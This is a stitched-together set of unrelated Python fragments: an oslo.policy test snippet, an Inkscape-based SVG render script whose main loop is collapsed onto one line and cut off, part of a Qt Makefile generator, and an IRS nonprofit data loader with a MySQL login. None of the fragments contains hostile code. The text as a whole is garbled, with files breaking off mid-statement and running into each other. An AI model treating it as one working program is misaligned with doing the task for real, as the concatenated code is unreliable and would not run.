            generator._generate_sample(['base_rules', 'rules'], sample_file,
                                       include_help=False)

        enforcer = policy.Enforcer(self.conf, policy_file='policy-sample.yaml')
        # register an opt defined in the file
        enforcer.register_default(policy.RuleDefault('admin',
                                                     'is_admin:False'))
        # register a new opt
        enforcer.register_default(policy.RuleDefault('foo', 'role:foo'))

        # Mock out
#!/usr/bin/env python3
################################################################################
#### ABOUT:                                                                 ####
####   Render script for the SVGs in the SOURCE_DIR directory.              ####
####   The renders will be placed in RENDER_DIR.                            ####
####   If possible, SVGs containing AUTH_TAG or PRINT_TAG will have         ####
####   the full tags inserted.                                              ####
####                                                                        ####
#### CAVEATS:                                                               ####
####   While spaces in filenames are supported, newlines are not.           ####
####   Presently, authorisation and printing tags will be inserted wholly   ####
####   on one line. No flowed text.                                         ####
################################################################################

#### You can override these defaults at run-time via command-line flags.    ####

# Candidate absolute paths to the Inkscape binary, tried in order
# (macOS app-bundle locations first, then the usual Linux path).
# You will almost definitely want to update this yourself
BACKEND_PATHS = ["/Applications/Inkscape.app/Contents/Resources/bin/inkscape",
                 "/Applications/Inkscape.app/Contents/MacOS/inkscape",
                 "/usr/bin/inkscape"]

# PDF collation tool (joins the per-page PDFs of multi-page documents).
COLLATER_PATH = "/usr/bin/pdfunite"

# If the paths below are relative, this file is assumed to be in the
# project's root directory.
SOURCE_DIR = "Artwork"                      # default: "Artwork"
RENDER_DIR = "Renders"                      # default: "Renders"
AUTH_TAG_FILE = "auth_tag.txt"              # default: "auth_tag.txt"
PRINT_TAG_FILE = "print_tag.txt"            # default: "print_tag.txt"
AUTH_TAG_FILE_BASIC = "auth_tag_basic.txt"  # default: "auth_tag_basic.txt"

# The text below is found, and replaced with the content of the relevant
# file listed above. Neither replaced text may be an SVG tag, for obvious
# reasons.
AUTH_TAG = "PPAU_AUTH_TAG"                  # default: "PPAU_AUTH_TAG"
PRINT_TAG = "PPAU_PRINT_TAG"                # default: "PPAU_PRINT_TAG"

#### Other settings ####

VERBOSE = False
NO_COLLATE = False
COLLATE_FMT = r'(.*)(_[pP])(\d+)(-\w*)?$'
# Collation format regex spec: four groups, consisting of...
# 1. the primary file name,
# 2. an underscore and a P,
# 3. digit[s] specifying the page order
# 4. optional alphanumeric description starting with a hyphen
#    [the extension follows and is handled separately]
# example: `relative/path/to/filename_p1.svg`

#### You can't currently override these at run-time ####

FORMATS = ["pdf", "png"]

# (name, include auth tag, include print tag)
VARIANTS = [("auth", True, False), ("both", True, True), ("none", False, False)]
# NB: it's absurd to include a print tag but not an auth tag.

# Manifest output file
MANIFEST_FILE = "MANIFEST.json"

################################################################################
#### End users shouldn't need to ever edit anything below this comment.     ####
################################################################################

VERSION = "0.5.1"
BACKEND = "inkscape"
COLLATER = "pdfunite"
BACKEND_PATH = ""   # resolved below from BACKEND_PATHS / `which`

# import all the things
import subprocess
import os
import sys
import shutil
import shlex
import tempfile
import time
import argparse
import filecmp
import json
import re
import io

# Parse arguments.  Each flag defaults to the module-level constant above,
# so editing the constants and passing flags are equivalent.
parser = argparse.ArgumentParser(description="Render the source files.",
                                 prog="PPAU-Graphics Renderscript")

parser.add_argument('--source_dir', dest='source_dir', action='store',
                    default=SOURCE_DIR,
                    help="The directory containing the source files.")

parser.add_argument('--render_dir', dest='render_dir', action='store',
                    default=RENDER_DIR,
                    help="Where to put the rendered files. " +
                    "It will be created if necessary.")

parser.add_argument('--auth_tag_file', dest='auth_tag_file', action='store',
                    default=AUTH_TAG_FILE,
                    help="The file containing the authorisation text.")

parser.add_argument('--auth_tag_file_basic', dest='auth_tag_file_basic',
                    action='store', default=AUTH_TAG_FILE_BASIC,
                    help="The file containing the authorisation text\
 specifying only a town/city (for digital material).")

parser.add_argument('--print_tag_file', dest='print_tag_file', action='store',
                    default=PRINT_TAG_FILE,
                    help="The file containing the printer location text.")

parser.add_argument('--auth_tag', dest='auth_tag', action='store',
                    default=AUTH_TAG,
                    help="The placeholder authorisation text.")

parser.add_argument('--print_tag', dest='print_tag', action='store',
                    default=PRINT_TAG,
                    help="The placeholder printer text.")

parser.add_argument('--backend_path', dest='backend_path', action='store',
                    default=BACKEND_PATH,
                    help="The path to the backend renderer, " +
                    "by default your "+ BACKEND + " install.")

parser.add_argument('--no-collate', dest='no_collate', action='store_const',
                    default=NO_COLLATE, const=True,
                    help="Don't collate multi-page files.")

parser.add_argument('--collate-fmt', dest='collate_fmt', action='store',
                    default=COLLATE_FMT,
                    help="A regex string that matches your filename numbering pattern.")

parser.add_argument('--verbose', dest='verbose', action='store_const',
                    default=VERBOSE, const=True,
                    help="Be more verbose about file processing.")

parser.add_argument('--version', action='version', version='%(prog)s '+VERSION)

args = parser.parse_args()

# Update Flags: fold the parsed command-line values back into the globals
# that the rest of the script reads.
SOURCE_DIR = args.source_dir
RENDER_DIR = args.render_dir
AUTH_TAG_FILE = args.auth_tag_file
AUTH_TAG_FILE_BASIC = args.auth_tag_file_basic
PRINT_TAG_FILE = args.print_tag_file
AUTH_TAG = args.auth_tag
PRINT_TAG = args.print_tag
BACKEND_PATH = args.backend_path
NO_COLLATE = args.no_collate
COLLATE_FMT = args.collate_fmt
VERBOSE = args.verbose

# Fix directory issues by using absolute pathnames (if possible).
# (These come about because the current working directory is not
# necessarily the project root directory).
# sys.path[0] is the directory containing this script; it is empty in some
# embedding contexts, hence the guard.
if sys.path[0]:
    if not os.path.isabs(SOURCE_DIR):
        SOURCE_DIR = os.path.join(sys.path[0], SOURCE_DIR)
    if not os.path.isabs(RENDER_DIR):
        RENDER_DIR = os.path.join(sys.path[0], RENDER_DIR)
    if not os.path.isabs(AUTH_TAG_FILE):
        AUTH_TAG_FILE = os.path.join(sys.path[0], AUTH_TAG_FILE)
    if not os.path.isabs(AUTH_TAG_FILE_BASIC):
        AUTH_TAG_FILE_BASIC = os.path.join(sys.path[0], AUTH_TAG_FILE_BASIC)
    if not os.path.isabs(PRINT_TAG_FILE):
        PRINT_TAG_FILE = os.path.join(sys.path[0], PRINT_TAG_FILE)


# Just a little helper function: print to stderr, but only when --verbose.
def printv(*args, **kwargs):
    if VERBOSE:
        print(*args, **kwargs, file=sys.stderr)


printv("Version:", VERSION)

# make BACKEND work (on posix systems, anyway):
# try the hard-coded candidate paths first; the for-else falls back to
# `which` when none of them exist, and bails out entirely otherwise.
for bp in BACKEND_PATHS:
    if os.path.exists(bp):
        BACKEND_PATH = bp
        break
else:
    if os.name == "posix":
        backendtry = subprocess.run(["which", BACKEND],
                                    stdout=subprocess.PIPE,
                                    universal_newlines=True)\
                                    .stdout.strip()
        if backendtry:
            printv("Using "+ BACKEND +" at " + backendtry + " instead.")
            BACKEND_PATH = backendtry
        else:
            print("ERROR: could not find "+ BACKEND +"!", file=sys.stderr)
            sys.exit(1)
    else:
        print("ERROR: could not find "+ BACKEND +"!", file=sys.stderr)
        sys.exit(1)

# Go find COLLATER if we haven't already (same strategy as for the backend,
# but only needed when collation is enabled).
if not os.path.exists(COLLATER_PATH) and not NO_COLLATE:
    printv("{} not found at specified path {}".format(COLLATER, COLLATER_PATH))
    if os.name == "posix":
        collatertry = subprocess.run(["which", COLLATER],
                                     stdout=subprocess.PIPE,
                                     universal_newlines=True)\
                                     .stdout.strip()
        if collatertry:
            printv("Using "+ COLLATER +" at " + collatertry + " instead.")
            COLLATER_PATH = collatertry
        else:
            print("ERROR: could not find "+ COLLATER +"!", file=sys.stderr)
            sys.exit(1)
    else:
        print("ERROR: could not find "+ COLLATER +"!", file=sys.stderr)
        sys.exit(1)

# Recursively find all SVGs in SOURCE_DIR.
# NOTE(review): relies on the external `find` utility, so filenames with
# newlines break the split (see CAVEATS above).
SVGs = subprocess.run(["find", SOURCE_DIR, "-type", "f", "-name", "*.svg"],
                      stdout=subprocess.PIPE,
                      universal_newlines=True)\
                      .stdout.strip().split(sep="\n")

# Load authorisation and printing tags
auth_tag_full = ""
auth_tag_basic = ""
print_tag_full = ""

# basic can fall back on full if it exists
try:
    with open(AUTH_TAG_FILE) as atfp:
        auth_tag_full = atfp.read().strip()
        printv("full", auth_tag_full)
except FileNotFoundError:
    print("Authorisation tag file not found!",
          "No substitution will be performed.")
    auth_tag_full = AUTH_TAG

try:
    with open(AUTH_TAG_FILE_BASIC) as atfp:
        auth_tag_basic = atfp.read().strip()
except FileNotFoundError:
    print("Basic auth tag file not found! Falling back on", AUTH_TAG_FILE)
    auth_tag_basic = auth_tag_full

try:
    with open(PRINT_TAG_FILE) as ptfp:
        print_tag_full = ptfp.read().strip()
        printv(print_tag_full)
except FileNotFoundError:
    print("Printing tag file not found!",
          "No substitution will be performed.")
    print_tag_full = PRINT_TAG

# We also want to keep a manifest of what we've done.
# {file basename, [paths to renders...]}
# but we don't actually want absolute pathnames for that
# we want them relative to the Source and Render dirs
manifest = {}
multipagers = {}    # multi-page documents found via COLLATE_FMT
skipcount = 0       # renders skipped because they were up to date
updatecount = 0     # renders actually (re)generated
notagcount = 0      # outputs skipped because the source lacked the tag

# Small amount of Inkscape funzies.
# Make shell mode work, part 1
commands = io.StringIO()

# Iterate over SVGs...
for s in SVGs: if len(s) == 0: continue (sdir, sbase) = os.path.split(s) # actually use relative path key = os.path.splitext(s[(len(SOURCE_DIR)+1):])[0] printv('1:\t', key) # figure out here if we're actually in a multi-pager page_num = 1 re_match = re.search(COLLATE_FMT, key) newkey = key # updated if multipager if re_match: newkey = re_match.group(1) if newkey not in multipagers: multipagers[newkey] = [] multipagers[newkey].append((re_match.group(2),re_match.group(3))) printv("*** Found a multi-pager: {}, page {}".format(re_match.group(1), re_match.group(3))) page_num = int(re_match.group(3)) # initialise # manifest[key] = [] if not newkey in manifest: manifest[newkey] = {} submanifest = [] # pop variants in here instead # Iterate over variants... for variant in VARIANTS: auth_tag_var = "" print_tag_var = "" if variant[1]: # default to basic auth_tag_var = auth_tag_basic if variant[2]: # if we need a print tag, we need a full auth tag print_tag_var = print_tag_full auth_tag_var = auth_tag_full # override # We shall first output the auth'd SVGs to RENDER_DIR #rdir = os.path.join(RENDER_DIR, sdir.replace(SOURCE_DIR + os.path.sep, "")) # there's a bug about where outputs go and I suspect it's this line ^^ ## sometimes SOURCE_DIR already has a trailing path separator and sdir doesn't sfrag = sdir.replace(SOURCE_DIR.strip(os.path.sep), "").strip(os.path.sep) rdir = os.path.normpath(os.path.join(RENDER_DIR, sfrag)) (r_tag_root, r_tag_ext) = os.path.splitext(sbase) # Pathnames of tagged SVGs r_tag = os.path.join(rdir, r_tag_root + "-" + variant[0] + r_tag_ext) printv("sdir:", sdir, "sfrag:", sfrag, "rdir:", rdir, "r_tag", r_tag) #exit() # On checking file modification dates and skipping if 'no change': # Ideally we could not update the tagged SVG if it wouldn't change, # or at least not update its file modification date -- otherwise, # toggling output formats forces a full re-rendering. # Switching to/from alternate tags might also cause issues. 
# We have to handle this case by just speculatively tagging and # comparing to the existing file (if it exists) # OK. Create temp file and run sed into it for the tags # hmm. this runs once per output format right now. if not os.path.exists(rdir): # print(rdir) os.makedirs(rdir) # We should search the relevant file for the tag and skip # if we would normally substitute, but it doesn't exist if variant[1] and \ int(subprocess.run(["grep", "-cF", AUTH_TAG, s], stdout=subprocess.PIPE) .stdout) < 1: printv("No Auth Tag: skipping what would be", r_tag, sep='\t') notagcount += 1 continue if variant[2] and \ int(subprocess.run(["grep", "-cF", PRINT_TAG, s], stdout=subprocess.PIPE) .stdout) < 1: printv("No Print Tag: skipping what would be", r_tag, sep='\t') notagcount += 1 continue # Now it's sed time with tempfile.NamedTemporaryFile() as tmpfp: subprocess.run(["sed", "-e", "s/" + re.escape(AUTH_TAG) + "/" + re.escape(auth_tag_var) + "/g", "-e", "s/" + re.escape(PRINT_TAG) + "/" + re.escape(print_tag_var) + "/g", s], stdout=tmpfp) # Compare speculative and existing tagged SVGs if os.path.exists(r_tag): if filecmp.cmp(r_tag, tmpfp.name): # SVGs
and "QtAssistant" in self._qt: if "QtGui" not in self._qt: self._qt.append("QtGui") if "QtNetwork" not in self._qt: self._qt.append("QtNetwork") for mod in self._qt: lib = self._qt_module_to_lib(mod) libs.append(self.platform_lib(lib, self._is_framework(mod))) if sys.platform == "win32": # On Windows the dependent libraries seem to be in # qmake.conf rather than the .prl file and the # inter-dependencies between Qt libraries don't seem to # be anywhere. deps = _UniqueList() if mod in list(wdepmap.keys()): deps.extend(self.optional_list(wdepmap[mod])) if mod in list(qt_depmap.keys()): for qdep in qt_depmap[mod]: # Ignore the dependency if it is explicitly # linked. if qdep not in self._qt: libs.append(self.platform_lib(self._qt_module_to_lib(qdep))) if qdep in list(wdepmap.keys()): deps.extend(self.optional_list(wdepmap[qdep])) libs.extend(deps.as_list()) else: libs.extend(self._dependent_libs(lib, self._is_framework(mod))) else: # Windows needs the version number appended if Qt is a DLL. qt_lib = self.config.qt_lib if self.generator in ("MSVC", "MSVC.NET", "MSBUILD", "BMAKE") and win_shared: qt_lib = qt_lib + version_to_string(qt_version).replace(".", "") if self.config.qt_edition == "non-commercial": qt_lib = qt_lib + "nc" libs.append(self.platform_lib(qt_lib, self.config.qt_framework)) libs.extend(self._dependent_libs(self.config.qt_lib)) # Handle header directories. 
specd = os.path.join(mkspecs, "default") if not os.access(specd, os.F_OK): specd = os.path.join(mkspecs, self.config.platform) incdir.append(specd) qtincdir = self.optional_list("INCDIR_QT") if qtincdir: if qt_version >= 0x040000: for mod in self._qt: if mod == "QAxContainer": incdir.append(os.path.join(qtincdir[0], "ActiveQt")) elif self._is_framework(mod): idir = libdir_qt[0] if mod == "QtAssistant" and qt_version < 0x040202: mod = "QtAssistantClient" incdir.append(os.path.join(idir, mod + ".framework", "Headers")) if qt_version >= 0x050000: if mod == "QtGui": incdir.append(os.path.join(idir, "QtWidgets.framework", "Headers")) incdir.append(os.path.join(idir, "QtPrintSupport.framework", "Headers")) elif mod == "QtWebKit": incdir.append(os.path.join(idir, "QtWebKitWidgets.framework", "Headers")) else: idir = qtincdir[0] incdir.append(os.path.join(idir, mod)) if qt_version >= 0x050000: if mod == "QtGui": incdir.append(os.path.join(idir, "QtWidgets")) incdir.append(os.path.join(idir, "QtPrintSupport")) elif mod == "QtWebKit": incdir.append(os.path.join(idir, "QtWebKitWidgets")) # This must go after the module include directories. incdir.extend(qtincdir) if self._opengl: incdir.extend(self.optional_list("INCDIR_OPENGL")) lflags.extend(self.optional_list("LFLAGS_OPENGL")) libdir.extend(self.optional_list("LIBDIR_OPENGL")) libs.extend(self.optional_list("LIBS_OPENGL")) if self._qt or self._opengl: if qt_version < 0x040000 or self._opengl or "QtGui" in self._qt: incdir.extend(self.optional_list("INCDIR_X11")) libdir.extend(self.optional_list("LIBDIR_X11")) libs.extend(self.optional_list("LIBS_X11")) if self._threaded: libs.extend(self.optional_list("LIBS_THREAD")) libs.extend(self.optional_list("LIBS_RTMT")) else: libs.extend(self.optional_list("LIBS_RT")) if self.console: libs.extend(self.optional_list("LIBS_CONSOLE")) libs.extend(self.optional_list("LIBS_WINDOWS")) lflags.extend(self._platform_rpaths(rpaths.as_list())) # Save the transformed values. 
self.CFLAGS.set(cflags) self.CXXFLAGS.set(cxxflags) self.DEFINES.set(defines) self.INCDIR.set(incdir) self.LFLAGS.set(lflags) self.LIBDIR.set(libdir) self.LIBS.set(libs) # Don't do it again because it has side effects. self._finalised = 1 def _add_manifest(self, target=None): """Add the link flags for creating a manifest file. """ if target is None: target = "$(TARGET)" self.LFLAGS.append("/MANIFEST") self.LFLAGS.append("/MANIFESTFILE:%s.manifest" % target) def _is_framework(self, mod): """Return true if the given Qt module is a framework. """ return (self.config.qt_framework and (self.config.qt_version >= 0x040200 or mod != "QtAssistant")) def _qt_module_to_lib(self, mname): """Return the name of the Qt library corresponding to a module. mname is the name of the module. """ qt_version = self.config.qt_version if mname == "QtAssistant": if qt_version >= 0x040202 and sys.platform == "darwin": lib = mname else: lib = "QtAssistantClient" else: lib = mname lib += self._infix if self._debug: if sys.platform == "win32": lib = lib + "d" elif sys.platform == "darwin": if not self._is_framework(mname): lib = lib + "_debug" elif qt_version < 0x040200: lib = lib + "_debug" qt5_rename = False if sys.platform == "win32" and "shared" in self.config.qt_winconfig.split(): if (mname in ("QtCore", "QtDeclarative", "QtDesigner", "QtGui", "QtHelp", "QtMultimedia", "QtNetwork", "QtOpenGL", "QtScript", "QtScriptTools", "QtSql", "QtSvg", "QtTest", "QtWebKit", "QtXml", "QtXmlPatterns", "phonon", "QAxContainer", "QtPrintSupport", "QtWebKitWidgets", "QtWidgets") or (qt_version >= 0x040200 and mname == "QtAssistant")): if mname == "QAxContainer": if qt_version >= 0x050000: lib = "Qt5" + lib[1:] elif qt_version >= 0x050000: qt5_rename = True else: lib = lib + "4" elif sys.platform.startswith("linux") and qt_version >= 0x050000: qt5_rename = True if qt5_rename: lib = "Qt5" + lib[2:] return lib def optional_list(self, name): """Return an optional Makefile macro as a list. 
name is the name of the macro. """ return self.__dict__[name].as_list() def optional_string(self, name, default=""): """Return an optional Makefile macro as a string. name is the name of the macro. default is the default value """ s = ' '.join(self.optional_list(name)) if not s: s = default return s def required_string(self, name): """Return a required Makefile macro as a string. name is the name of the macro. """ s = self.optional_string(name) if not s: raise ValueError("\"%s\" must have a non-empty value" % name) return s def _platform_rpaths(self, rpaths): """Return a list of platform specific rpath flags. rpaths is the cannonical list of rpaths. """ flags = [] prefix = self.optional_string("RPATH") if prefix == "": # This was renamed in Qt v4.7. prefix = self.optional_string("LFLAGS_RPATH") if prefix != "": for r in rpaths: flags.append(_quote(prefix + r)) return flags def platform_lib(self, clib, framework=0): """Return a library name in platform specific form. clib is the library name in cannonical form. framework is set of the library is implemented as a MacOS framework. """ if self.generator in ("MSVC", "MSVC.NET", "MSBUILD", "BMAKE"): plib = clib + ".lib" elif sys.platform == "darwin" and framework: plib = "-framework " + clib else: plib = "-l" + clib return plib def _dependent_libs(self, clib, framework=0): """Return a list of additional libraries (in platform specific form) that must be linked with a library. clib is the library name in cannonical form. framework is set of the library is implemented as a MacOS framework. 
""" if self.generator in ("MSVC", "MSVC.NET", "MSBUILD", "BMAKE"): prl_name = os.path.join(self.config.qt_lib_dir, clib + ".prl") elif sys.platform == "darwin" and framework: prl_name = os.path.join(self.config.qt_lib_dir, clib + ".framework", clib + ".prl") else: prl_name = os.path.join(self.config.qt_lib_dir, "lib" + clib + ".prl") libs = self._extract_value(prl_name, "QMAKE_PRL_LIBS").split() if self.config.qt_version >= 0x050000: xtra_libs = [] if clib in ("QtGui", "Qt5Gui"): xtra_libs.append("QtWidgets") xtra_libs.append("QtPrintSupport") elif clib in ("QtWebKit", "Qt5WebKit"): xtra_libs.append("QtWebKitWidgets") for xtra in xtra_libs: libs.extend( self.platform_lib( self._qt_module_to_lib(xtra), framework).split()) return libs def _extract_value(self, fname, vname): """Return the stripped value from a name=value line in a file. fname is the name of the file. vname is the name of the value. """ value = "" if os.access(fname, os.F_OK): try: f = open(fname, "r") except IOError: error("Unable to open \"%s\"" % fname) line = f.readline() while line: line = line.strip() if line and line[0] != "#": eq = line.find("=") if eq > 0 and line[:eq].strip() == vname: value = line[eq + 1:].strip() break line = f.readline() f.close() return value def parse_build_file(self, filename): """ Parse a build file and return the corresponding dictionary. filename is the name of the build file. If it is a dictionary instead then its contents are validated. """ if type(filename) == dict: bfname = "dictionary" bdict = filename else: if os.path.isabs(filename): # We appear to be building out of the source tree. 
self._src_dir = os.path.dirname(filename) bfname = filename else: bfname = os.path.join(self.dir, filename) bdict = {} try: f = open(bfname, "r") except IOError: error("Unable to open \"%s\"" % bfname) line_nr = 1 line = f.readline() while line: line = line.strip() if line and line[0] != "#": eq = line.find("=") if eq <= 0: error("\"%s\" line %d: Line must be in the form 'name = value value...'." % (bfname, line_nr)) bdict[line[:eq].strip()] = line[eq + 1:].strip() line_nr = line_nr + 1 line = f.readline() f.close() # Check the compulsory values. for i in ("target", "sources"): try: bdict[i] except KeyError: error("\"%s\" is missing from \"%s\"." % (i, bfname)) # Get the optional values. for i in ("headers", "moc_headers"): try: bdict[i] except KeyError: bdict[i] = "" # Generate the list of objects. if self.generator in ("MSVC", "MSVC.NET", "MSBUILD", "BMAKE"): ext = ".obj" else: ext = ".o" olist = [] for f in bdict["sources"].split(): root, discard = os.path.splitext(f) olist.append(root + ext) for f in bdict["moc_headers"].split(): if not self._qt: error("\"%s\" defines \"moc_headers\" for a non-Qt module." % bfname) root, discard = os.path.splitext(f) olist.append("moc_" + root + ext) bdict["objects"] = ' '.join(olist) return bdict def clean_build_file_objects(self, mfile, build): """Generate the clean target. mfile is the file object. build is the dictionary created from the build file. """ mfile.write("\t-%s $(TARGET)\n" % self.rm) for f in build["objects"].split(): mfile.write("\t-%s %s\n" % (self.rm, f)) for f in build["moc_headers"].split(): root, discard = os.path.splitext(f) mfile.write("\t-%s moc_%s.cpp\n" % (self.rm, root)) def ready(self): """The Makefile is now ready to be used. """ if not self._finalised: self.finalise() def generate(self): """Generate the Makefile. """ self.ready() # Make sure the destination directory exists. 
try: os.makedirs(self.dir) except: pass mfname = os.path.join(self.dir, self._makefile) try: mfile = open(mfname, "w") except IOError: error("Unable to create
import os, sys
import re
import zipfile
import requests
import warnings
import logging
import pandas as pd
import numpy as np
from stat import S_IREAD, S_IRGRP, S_IROTH
import getpass
import pymysql

# Code by <NAME> (<EMAIL>), 2016-2017

class LoadData():
    """
    This class is inherited by the Data class, and contains the methods
    related to retrieving data remotely.  From the web, that includes the raw
    990 IRS data, the raw epostcard (990N) IRS data, and the raw BMR IRS
    data.  From NCCS MySQL, it has the methods for nteedocAllEins,
    lu_fipsmsa, and all of the prior NCCS core file releases.
    """

    def get_urls(self):
        """
        Base method for loading the URLs necessary for downloads into memory.

        Main core file URL:
        https://www.irs.gov/uac/soi-tax-stats-annual-extract-of-tax-exempt-organization-financial-data

        ARGUMENTS
        None

        RETURNS
        None (sets self.urls)
        """
        main = self.main
        path = main.path
        # One sub-dict per form type; 'epostcard' is replaced by a single URL
        # string in epost_urls.
        entries = {'PF':{}, 'EZ':{}, 'Full':{}, 'BMF':{}, 'epostcard':{}}
        entries = self.form_urls(entries, path)
        entries = self.epost_urls(entries, path)
        entries = self.bmf_urls(entries, path)
        self.urls = entries

    def form_urls(self, entries, path):
        """
        Processes the text file in the "settings/urls" folder for EZ, Full
        and PF download paths.

        ARGUMENTS
        entries (dict) : A dictionary with keys=form and values=URLs or dict of URLs
        path (str) : The base path on the local system

        RETURNS
        entries (dict) : Updated with the core file URLs as an entry.
        """
        main = self.main
        # Expected line shape: "<year> = <url ending in .dat/.zip/.csv/.txt>";
        # lines beginning with '#' are comments and are skipped.
        urlregex = re.compile(r'(\d{4})\s*=\s*(https?:\/\/.+\.(dat|zip|csv|txt))\s*')
        skipline = re.compile(r'^#')
        for form in main.forms:
            with open(os.path.join(path, 'settings', 'urls', form.lower()+'.txt')) as f:
                for line in f:
                    regex_match = urlregex.match(line)
                    skip_match = skipline.match(line)
                    if regex_match and not skip_match:
                        year = int(regex_match.group(1))
                        url = regex_match.group(2)
                        entries[form][year] = url
        print('')
        return entries

    def epost_urls(self, entries, path):
        """
        Processes the text file in the "settings/urls" folder for the
        epostcard (990N) download path.

        ARGUMENTS
        entries (dict) : A dictionary with keys=form and values=URLs or dict of URLs
        path (str) : The base path on the local system

        RETURNS
        entries (dict) : Updated with the epostcard URLs as an entry.
        """
        epostregex = re.compile(r'(epostcard)\s*=\s*(https?:\/\/.+\.(dat|zip|csv|txt))\s*')
        skipline = re.compile(r'^#')
        with open(os.path.join(path, 'settings', 'urls', 'epostcard.txt')) as f:
            for line in f:
                regex_match = epostregex.match(line)
                skip_match = skipline.match(line)
                if regex_match and not skip_match:
                    # Single URL, not a per-year dict like the core forms.
                    url = regex_match.group(2)
                    entries['epostcard'] = url
        return entries

    def bmf_urls(self, entries, path):
        """
        Processes the text file in the "settings/urls" folder for BMF
        download path.

        ARGUMENTS
        entries (dict) : A dictionary with keys=form and values=URLs or dict of URLs
        path (str) : The base path on the local system

        RETURNS
        entries (dict) : Updated with the BMF URLs as an entry.
        """
        # BMF files are split by region: lines look like "region1 = <url>".
        bmfregex = re.compile(r'(region\d)\s*=\s*(https?:\/\/.+\.(dat|zip|csv|txt))\s*')
        skipline = re.compile(r'^#')
        with open(os.path.join(path, 'settings', 'urls', 'bmf.txt')) as f:
            for line in f:
                regex_match = bmfregex.match(line)
                skip_match = skipline.match(line)
                if regex_match and not skip_match:
                    url = regex_match.group(2)
                    region = regex_match.group(1)
                    entries['BMF'][region] = url
        return entries

    def download(self):
        """
        Base method for downloading the main core files from the IRS, setting
        the EIN as the index, and updating the SOURCE column with the
        appropriate file name.

        ARGUMENTS
        None

        RETURNS
        None (populates self.data_dict)

        RAISES
        Exception : when no URL is configured for the requested year/form.
        """
        main = self.main
        delim = self.irs_delim
        current_yr = self.core_file_year #int
        main.logger.info('Beginning any necessary downloads from the IRS.')
        for form in main.forms:
            try:
                url = self.urls[form][current_yr]
            except KeyError:
                # BUG FIX: this previously referenced the undefined name
                # `current_year`, raising a NameError instead of the
                # intended, informative Exception.
                raise Exception('URL not found for core file year {}, form {}. Please check the "urls" folder.'.format(current_yr, form))
            df = pd.read_csv(self.download_file(url), sep=delim, dtype='str')
            #Most IRS files have EIN in caps, but at least one (2012 EZ) has it in lowercase
            if 'ein' in df.columns:
                df.rename(columns={'ein':'EIN'}, inplace=True)
            df.set_index('EIN', inplace=True)
            #adds the source file name as a column
            df['SOURCE'] = url.split('/')[-1]
            self.data_dict[form] = df
        main.logger.info('Downloading complete.\n')

    def sql_auth(self):
        """
        Handles logging into the NCCS MySQL server, including prompting for
        credentials.

        ARGUMENTS
        None

        RETURNS
        None (sets self.sql_connection, possibly to None)
        """
        if self.get_from_sql:
            self.main.logger.info('Authenticating connection to MySQL server...')
            un = input(' MySQL user name: ')
            # NOTE(review): the isatty branches look inverted relative to the
            # usual getpass idiom (getpass normally works *on* a tty);
            # preserved as-is -- confirm the intended environments.
            if sys.stdin.isatty():
                #program is being run in an interactive interpreter, and the password echo can't be shut off
                pw = input(' MySQL password: ')
            else:
                #system is running from the command line, and password echo can be off
                pw = getpass.getpass(prompt=' MySQL password: ')
            try:
                self.sql_connection = pymysql.connect(host=self.sql_server_name, db='nccs', user=un, password=pw)
            except pymysql.OperationalError:
                self.main.logger.info(' failed to connect to server; will try to load from downloads/nccs folder.\n')
                self.sql_connection = None
            else:
                self.main.logger.info(' login successful, will attempt to retrieve all necessary data from the SQL database.\n')
        else:
            self.main.logger.info('Without logging into NCCS MySQL server, will look for all files in downloads/nccs folder.\n')
            self.sql_connection = None

    def close_sql(self):
        """
        Cleanly shuts down the NCCS MySQL connection.

        ARGUMENTS
        None

        RETURNS
        None
        """
        # BUG FIX: guard against sql_connection being None -- sql_auth leaves
        # it None when the login fails even though get_from_sql is set, and
        # closing then raised AttributeError.  (Also fixed the "Cosing" typo.)
        if self.get_from_sql and self.sql_connection is not None:
            self.main.logger.info('Closing MySQL connection.')
            self.sql_connection.close()

    def get_sql(self, fname, dbase, cols='*', index_col='EIN', match_dtypes=None, force_sql_cols=False):
        """
        Method for downloading a file, passed as the "fname" argument, from
        the MySQL connection established in the sql_auth method.

        It will first check its own cache to see if it has already downloaded
        the file and is holding it in memory, then it will look in the
        "downloads/nccs" folder to see if that exact fname has already been
        downloaded.  Only if both of those are false will it connect to MySQL
        to retrieve the file.

        For users off the Urban campus or without a login to the NCCS MySQL
        server, having all the necessary files as .csv documents in the
        "downloads/nccs" folder means the program can still build.  See
        "folder instructions.txt" in that folder for more details.

        ARGUMENTS
        fname (str): The MySQL table name (also used as the cached .csv name).
        dbase (str): The MySQL database to select before querying.
        cols (str or list): Default '*', used when only a subset of the data
            should be returned.
        index_col (str): Default 'EIN', specifies the column to use as the
            index.
        match_dtypes (DataFrame): Default None, if a dataframe is passed it
            will extract the schema from it and apply it to the data
            specified in fname; otherwise it uses the MySQL defaults.
        force_sql_cols (bool): Default False, If True it will force the
            columns specified in the cols argument to become a part of the
            SQL statement; otherwise it downloads * in the SELECT statement
            and then subsets it later.  This is used, for example, in
            nteedocAllEINS because the full file is 1.5 gigabytes but only
            1/3rd of that is needed.

        RETURNS
        DataFrame
        """
        file_path = os.path.join(self.main.path, self.nccs_download_folder)
        existing_downloads = os.listdir(file_path)
        existing_downloads = [f for f in existing_downloads if f.endswith('.csv')]

        # 1) In-memory cache.
        if fname in self.sql_cache:
            self.main.logger.info('File already cached; trying version in memory.')
            if isinstance(cols, list):
                try:
                    return self.sql_cache[fname][cols]
                except KeyError:
                    self.main.logger.info(' Specified columns not in memory.')
                    pass #if the dataframe is cached already but the desired cols are missing, continue with sql loading
            else:
                return self.sql_cache[fname]

        # 2) Previously-downloaded .csv on disk.
        if fname+'.csv' in existing_downloads:
            self.main.logger.info('File found in NCCS downloads; using already-downloaded version.')
            if match_dtypes is not None:
                dtype = match_dtypes.dtypes.to_dict()
                dtype['EIN'] = 'str'  # EIN must stay a string (leading zeros)
            else:
                dtype = 'str'
            df = pd.read_csv(os.path.join(file_path, fname+'.csv'), dtype=dtype, low_memory=False, encoding='utf-8')
            if index_col is not None:
                df.set_index(index_col, inplace=True)
            if match_dtypes is None:
                #recast the str columns to float64 or int64
                num_cols = [c for c in self.numeric_columns if c in df]
                for col in num_cols:
                    df[col] = pd.to_numeric(df[col], errors='coerce').fillna(0)
                #fill string NA columns with empty strings
                str_cols = df.select_dtypes(include=[np.object_]).columns.values
                df.loc[:, str_cols] = df.loc[:, str_cols].fillna('')

        # 3) Live MySQL query (result is also written to disk for next time).
        elif self.sql_connection is not None:
            con = self.sql_connection
            con.select_db(dbase)
            if force_sql_cols:
                sql_cols = ', '.join(cols)
            else:
                sql_cols = '*'
